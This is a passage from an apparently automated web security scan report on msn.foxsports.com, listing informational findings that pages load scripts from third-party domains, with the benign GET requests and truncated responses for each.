HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 263784
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=34
Date: Sat, 29 Jan 2011 23:49:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>

<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
</script>-->
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/js/vp.js"></script>
...[SNIP]...

<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.235. http://msn.foxsports.com/fantasy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/fantasy

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://b.scorecardresearch.com/beacon.js
http://images.video.msn.com/js/ch/Channels.js

Request

GET /fantasy HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 234449
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=18
Date: Sat, 29 Jan 2011 23:49:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>

<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://images.video.redacted/js/ch/Channels.js"></script>
...[SNIP]...

<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.236. http://msn.foxsports.com/foxsoccer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/foxsoccer

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://b.scorecardresearch.com/beacon.js
http://edge.quantserve.com/quant.js
http://images.video.msn.com/js/vp.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /foxsoccer HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 232970
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=34
Date: Sat, 29 Jan 2011 23:49:25 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>

<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
</style>

<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/js/vp.js"></script>
...[SNIP]...
<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

23.237. http://msn.foxsports.com/golf/leaderboard previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/golf/leaderboard

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://b.scorecardresearch.com/beacon.js

Request

GET /golf/leaderboard HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 253260
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=9
Date: Sat, 29 Jan 2011 23:49:57 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>

<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.238. http://msn.foxsports.com/mlb previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/mlb

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://b.scorecardresearch.com/beacon.js
http://images.video.msn.com/js/vp.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /mlb HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 277649
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=12
Date: Sat, 29 Jan 2011 23:49:17 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>

<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
</script>-->
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/js/vp.js"></script>
...[SNIP]...

<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.239. http://msn.foxsports.com/mlb/story/Orioles-hope-to-add-Guerrero-to-revamped-roster-83871116 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/mlb/story/Orioles-hope-to-add-Guerrero-to-revamped-roster-83871116

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://b.scorecardresearch.com/beacon.js
http://cache-01.cleanprint.net/cp/ccg?divId=2275
http://images.video.msn.com/flash/script/embed.js
http://images.video.msn.com/js/ch/Channels.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /mlb/story/Orioles-hope-to-add-Guerrero-to-revamped-roster-83871116 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 237436
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=9
Date: Sat, 29 Jan 2011 23:49:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>

<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
http://static.foxsports.com/cgi-bin/merge?files=/fe/css/story/story_tools.css,/fe/css/story/storyPage.css,/fe/css/multimediaCP.css&contentType=text/css&v=3_149_37" rel="stylesheet" type="text/css"/>

<script type="text/javascript" src="http://images.video.redacted/js/ch/Channels.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/flash/script/embed.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2275" name="cleanprintloader" ></script>
...[SNIP]...

<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.240. http://msn.foxsports.com/mlb/story/Rangers-Napoli-avoid-arbitration-with-58M-deal-14623420 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/mlb/story/Rangers-Napoli-avoid-arbitration-with-58M-deal-14623420

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://b.scorecardresearch.com/beacon.js
http://cache-01.cleanprint.net/cp/ccg?divId=2275
http://images.video.msn.com/flash/script/embed.js
http://images.video.msn.com/js/ch/Channels.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /mlb/story/Rangers-Napoli-avoid-arbitration-with-58M-deal-14623420 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 234477
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=35
Date: Sat, 29 Jan 2011 23:49:46 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>

<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
http://static.foxsports.com/cgi-bin/merge?files=/fe/css/story/story_tools.css,/fe/css/story/storyPage.css,/fe/css/multimediaCP.css&contentType=text/css&v=3_149_37" rel="stylesheet" type="text/css"/>

<script type="text/javascript" src="http://images.video.redacted/js/ch/Channels.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/flash/script/embed.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2275" name="cleanprintloader" ></script>
...[SNIP]...

<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.241. http://msn.foxsports.com/mlb/story/new-york-yankees-president-ted-levine-calls-out-texas-rangers-ceo-chuck-greenberg-012911 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/mlb/story/new-york-yankees-president-ted-levine-calls-out-texas-rangers-ceo-chuck-greenberg-012911

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://b.scorecardresearch.com/beacon.js
http://cache-01.cleanprint.net/cp/ccg?divId=2275
http://images.video.msn.com/flash/script/embed.js
http://images.video.msn.com/js/ch/Channels.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /mlb/story/new-york-yankees-president-ted-levine-calls-out-texas-rangers-ceo-chuck-greenberg-012911 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 237610
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=39
Date: Sat, 29 Jan 2011 23:49:49 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>

<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
http://static.foxsports.com/cgi-bin/merge?files=/fe/css/story/story_tools.css,/fe/css/story/storyPage.css,/fe/css/multimediaCP.css&contentType=text/css&v=3_149_37" rel="stylesheet" type="text/css"/>

<script type="text/javascript" src="http://images.video.redacted/js/ch/Channels.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/flash/script/embed.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2275" name="cleanprintloader" ></script>
...[SNIP]...

<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.242. http://msn.foxsports.com/nascar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/nascar

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://b.scorecardresearch.com/beacon.js
http://images.video.msn.com/js/vp.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /nascar HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 276706
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=25
Date: Sat, 29 Jan 2011 23:49:23 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>

<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
</script>-->
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/js/vp.js"></script>
...[SNIP]...

<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.243. http://msn.foxsports.com/nba previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/nba

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://b.scorecardresearch.com/beacon.js
http://images.video.msn.com/js/vp.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /nba HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 276446
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=24
Date: Sat, 29 Jan 2011 23:49:18 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>

<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
</script>-->
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/js/vp.js"></script>
...[SNIP]...

<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.244. http://msn.foxsports.com/nba/gallery/new-york-knicks-atlanta-hawks-fight-marvin-williams-shawne-williams-gallery-012911 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/nba/gallery/new-york-knicks-atlanta-hawks-fight-marvin-williams-shawne-williams-gallery-012911

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://b.scorecardresearch.com/beacon.js

Request

GET /nba/gallery/new-york-knicks-atlanta-hawks-fight-marvin-williams-shawne-williams-gallery-012911 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 223854
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=28
Date: Sat, 29 Jan 2011 23:50:06 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>

<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.245. http://msn.foxsports.com/nba/story/Marvin-Willians-Shawne-Williams-suspension-Knicks-Hawks-012911 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/nba/story/Marvin-Willians-Shawne-Williams-suspension-Knicks-Hawks-012911

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://b.scorecardresearch.com/beacon.js
http://cache-01.cleanprint.net/cp/ccg?divId=2275
http://images.video.msn.com/flash/script/embed.js
http://images.video.msn.com/js/ch/Channels.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /nba/story/Marvin-Willians-Shawne-Williams-suspension-Knicks-Hawks-012911 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 252681
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=1
Date: Sat, 29 Jan 2011 23:50:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>

<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
http://static.foxsports.com/cgi-bin/merge?files=/fe/css/story/story_tools.css,/fe/css/story/storyPage.css,/fe/css/multimediaCP.css&contentType=text/css&v=3_149_37" rel="stylesheet" type="text/css"/>

<script type="text/javascript" src="http://images.video.redacted/js/ch/Channels.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/flash/script/embed.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2275" name="cleanprintloader" ></script>
...[SNIP]...

<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.246. http://msn.foxsports.com/nba/story/OJ-Mayo-reason-for-suspension-energy-drink-012911 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/nba/story/OJ-Mayo-reason-for-suspension-energy-drink-012911

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://b.scorecardresearch.com/beacon.js
http://cache-01.cleanprint.net/cp/ccg?divId=2275
http://images.video.msn.com/flash/script/embed.js
http://images.video.msn.com/js/ch/Channels.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /nba/story/OJ-Mayo-reason-for-suspension-energy-drink-012911 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 257781
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=36
Date: Sat, 29 Jan 2011 23:49:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>

<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
http://static.foxsports.com/cgi-bin/merge?files=/fe/css/story/story_tools.css,/fe/css/story/storyPage.css,/fe/css/multimediaCP.css&contentType=text/css&v=3_149_37" rel="stylesheet" type="text/css"/>

<script type="text/javascript" src="http://images.video.redacted/js/ch/Channels.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/flash/script/embed.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2275" name="cleanprintloader" ></script>
...[SNIP]...

<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.247. http://msn.foxsports.com/nba/story/shaq-oneal-kobe-bryant-los-angeles-lakers-boston-celtics-rivalry-intact-012911 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/nba/story/shaq-oneal-kobe-bryant-los-angeles-lakers-boston-celtics-rivalry-intact-012911

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://b.scorecardresearch.com/beacon.js
http://cache-01.cleanprint.net/cp/ccg?divId=2275
http://images.video.msn.com/flash/script/embed.js
http://images.video.msn.com/js/ch/Channels.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

GET /nba/story/shaq-oneal-kobe-bryant-los-angeles-lakers-boston-celtics-rivalry-intact-012911 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 259031
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=6
Date: Sat, 29 Jan 2011 23:50:03 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>

<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
http://static.foxsports.com/cgi-bin/merge?files=/fe/css/story/story_tools.css,/fe/css/story/storyPage.css,/fe/css/multimediaCP.css&contentType=text/css&v=3_149_37" rel="stylesheet" type="text/css"/>

<script type="text/javascript" src="http://images.video.redacted/js/ch/Channels.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/flash/script/embed.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2275" name="cleanprintloader" ></script>
...[SNIP]...

<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.248. http://msn.foxsports.com/nfl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/nfl

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://b.scorecardresearch.com/beacon.js
http://images.video.msn.com/js/vp.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /nfl HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 277828
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=9
Date: Sat, 29 Jan 2011 23:49:16 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>

<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
</script>-->
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/js/vp.js"></script>
...[SNIP]...

<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.249. http://msn.foxsports.com/nhl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/nhl

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://b.scorecardresearch.com/beacon.js
http://images.video.msn.com/js/vp.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /nhl HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 263611
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=1
Date: Sat, 29 Jan 2011 23:49:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>

<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
</script>-->
<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/js/vp.js"></script>
...[SNIP]...

<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...

23.250. http://msn.foxsports.com/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/nhl/story/FBI-helping-solve-the-mystery-of-the-Chicago-Blackhawks-missing-Stanley-Cup-winning-puck-012811/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://b.scorecardresearch.com/beacon.js
http://cache-01.cleanprint.net/cp/ccg?divId=2275
http://images.video.msn.com/flash/script/embed.js
http://images.video.msn.com/js/ch/Channels.js
http://s7.addthis.com/js/152/addthis_widget.js

Request

Response

23.251. http://msn.foxsports.com/olympics/story/ian-thorpe-reportedly-mounting-comeback-for-2012-olympics-012911 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/olympics/story/ian-thorpe-reportedly-mounting-comeback-for-2012-olympics-012911

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads1.redacted/library/dap.js
http://b.scorecardresearch.com/beacon.js
http://cache-01.cleanprint.net/cp/ccg?divId=2275
http://images.video.msn.com/flash/script/embed.js
http://images.video.msn.com/js/ch/Channels.js
http://s7.addthis.com/js/152/addthis_widget.js
http://www4.tinker.com/standard/wrapper/wrapper.js?id=1470

Request

GET /olympics/story/ian-thorpe-reportedly-mounting-comeback-for-2012-olympics-012911 HTTP/1.1
Host: msn.foxsports.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Length: 225369
Content-Type: text/html;charset=UTF-8
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Cache-Control: max-age=16
Date: Sat, 29 Jan 2011 23:50:07 GMT
Connection: close

